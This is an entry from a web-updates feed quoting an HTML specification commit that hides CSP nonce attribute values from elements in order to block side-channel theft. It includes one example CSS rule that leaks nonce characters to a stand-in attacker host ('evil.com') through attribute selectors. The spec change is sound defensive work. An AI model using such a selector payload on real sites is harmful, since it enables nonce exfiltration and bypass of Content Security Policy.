Antenna.SuikaWiki

Web updates

HTML 19f5cce80155

Hide nonce content attribute values Some [recent attacks on CSP][1] rely on the ability to exfiltrate nonce data via various mechanisms that can read content attributes. CSS selectors are the best example: through clever use of prefix/postfix text matching selectors values can be sent out to an attacker's server for reuse (e.g., `script[nonce=a] { background: url("https://evil.com/nonce?a");}`). This patch mitigates the risk of this class of attack by hiding the nonce value from elements' content attributes by moving the `nonce` attributes into a new `NoncedElement` interface mixin, which is included into `HTMLElement`. That mixin defines the following behaviors for the `nonce` content attribute: 1. When the `nonce` content attribute is set or changed, its new value is copied into a `[[CryptographicNonce]]` slot on the element. 2. When a `NoncedElement` is inserted into a document which was delivered with a `Content-Security-Policy` header, the `nonce` content attribute is cleared out. The `nonce` IDL attribute getter and setter now operate on the `[[CryptographicNonce]]` slot's value rather than reflecting the content attribute, meaning that the nonce value remains exposed to script, but is opaque to non-script side-channels. Likewise, the `[[CryptographicNonce]]` slot's value is used when populating a request's cryptographic nonce metadata in order to deliver the nonce to CSP for validation. Tests: https://github.com/w3c/web-platform-tests/tree/master/content-security-policy/nonce-hiding Closes #2369. [1]:

Mike West